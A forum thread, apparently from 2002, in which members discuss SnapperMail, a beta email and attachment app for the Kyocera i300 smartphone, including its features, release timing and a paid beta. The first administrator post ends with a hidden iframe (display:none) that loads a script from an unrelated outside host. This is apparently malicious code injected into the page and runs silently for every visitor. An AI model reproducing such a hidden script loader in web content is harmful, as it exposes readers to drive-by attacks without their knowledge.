+ Reply to Thread
    Administrator

Arrow SnapperMail. All in one mobile solution!

guys and gals, this application does it all.

you can zip and unzip files on the I300/I330, etc...

you can download unlimited messages from your email clients.

view jpeg images, read e-books...

plus more. tons more....

the public beta is almost released,, perhaps by next week.

visit the site for more info.

it really could be the end all be all of programs for the smartphone.

SnapperMail

(i have been a part of the private beta, so i can attest to how well it works)<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

wow.. I like it. So you're using it on your I300 Marc?... any word on what they intend to charge for it?
    .....beam me up Scotty...

Administrator

Arrow

no word on how much it will cost, but i will pose the question to the developer and get an answer to you.

yes i am using it on the i300 and it works very well.
    for example, if someone sent you a email that was in the wokrs format, for example, you would not be able to read it on the '300 in that state, so you simply send it to a convert email address and it comes back to your phone converted for you to see.

just one of the many many features this program can do. and its a very small footprint in the phones memory.

as ststed, it should be available by next week, but will definately keep you guys up on it.

i300 knucklehead
    very cool! Can you tell me how the attachments work on the 300i since we don't have card storage, how do they manage to bypass the file restrictions with RAM?

In other words, how does it store JPGs, etc. to RAM? Does it convert them to .PDB format???

If so, this is definitely revolutionary!

Re: SnapperMail. All in one mobile solution!

Originally posted by Marctronixx
    guys and gals, this application does it all. it really could be the end all be all of programs for the smartphone.
    Checked out the site, Marc, and... whoa... kewl. :p Signed up for the public beta; hope it's soon.

Thanks for the post!

Lisa
    The Writers' Collective - no shared royalties, ever.
    www.writerscollective.org

Administrator

Arrow

pat,

i believe it does convert the file, but im not totally sure. i wil get an answer back to you..

lisa..

it may be available as early as next week. i will definately keep the guys and gals here updated...

WOW!!!

If this performs 50% as advertised, it's terrific, and satisfies a lot of my needs.

I've signed up for the public beta, and if anyone gets news on this please post it here.
    The older I get, the better I was...

Napoleon Bonaparte Jr.

hello

Is any way to get from you , before it comes on web site ?

Please , be like a pastor to your members ...

Get the best for your members ...

Administrator

Arrow

Originally posted by h_eisenson
    WOW!!!

If this performs 50% as advertised, it's terrific, and satisfies a lot of my needs.

I've signed up for the public beta, and if anyone gets news on this please post it here.
    i have been using it and it works over 50%! i am telling ya, this thing rocks! should be out next week.

Administrator
    Originally posted by patwoods
    very cool! Can you tell me how the attachments work on the 300i since we don't have card storage, how do they manage to bypass the file restrictions with RAM?

In other words, how does it store JPGs, etc. to RAM? Does it convert them to .PDB format???

If so, this is definitely revolutionary!

SnapperMail stores attachments (any kind including jpeg) in its database
    in native PC format. We pass the file to other applications using an object
    exchange similar to beaming. The other apps suck it in entirely in PC
    format and handle the display of it internally... You'll notice that you
    can beam an attachment to a laptop. That's proof that the file is real and
    not just a pdb version.

We pass the file to other applications using an object
    I'm lost...lol...not the first time...Marc, you're talkin "beamin"...don't you mean emailing to a translator program that then returns the file in native format?
    also.....wuts this "we"?...involved with this company?...lol, not that it matters - it's a cool program
    .....beam me up Scotty...

Administrator

Arrow

when you install a jpeg, or .zip file or whatever, the SF acts as if its "beaming" the file into the phone.. you actually see the beaming screen pop up when its being downloaded to the palm.. it then asks you if you want to install the file.. its very neat!

Administrator

Arrow

just reminding everyone that the public beat is released.

please join the yahoo group thats setup to discuss any issues yuo may have. Wil (the developer) wants feedback form i300 users...

Originally posted by Marctronixx
    just reminding everyone that the public beat is released.
    please join the yahoo group thats setup to discuss any issues yuo may have. Wil (the developer) wants feedback form i300 users...
    Marc,

Then please -- no offense -- inform Wil that if he wants my feedback for a beta, public or otherwise, he needs to pay me (with a free program, if not money), not the other way around. The email I got from them said I'd "only" have to pay $24 for the privilege of telling them what they still need to fix. Thanks, but no thanks. :p

My 2cents. YMMV.

Lisa
    The Writers' Collective - no shared royalties, ever.
    www.writerscollective.org

Administrator

Arrow

hmm.. i was not aware of a fee.. but i understand where you are coming from...

There's nothing unusual about paying to use a beta - an established and credible company provides a guarantee of the end-product, other assurances and benefits, discount, etc.

But I've never seen such a thing from an unknown with no track record -- and won't pay it. Over the decades, I've seen a ton of newguy stuff run into a brick wall such as incompatibility with a major app, and then quietly disappear.

On the other hand, if this works as advertised, and doesn't crash my system too often, I'll probably get it. But until others have debugged it I'll continue using what I have.
    The older I get, the better I was...

Napoleon Bonaparte Jr.

Hello

Wait few weeks for the "Mr.Taxi" .

Mr.Taxi is the best place for beta testers ,- You like it -

You buy it ...
    Last edited by sprint; 09-27-2002 at 07:34 AM.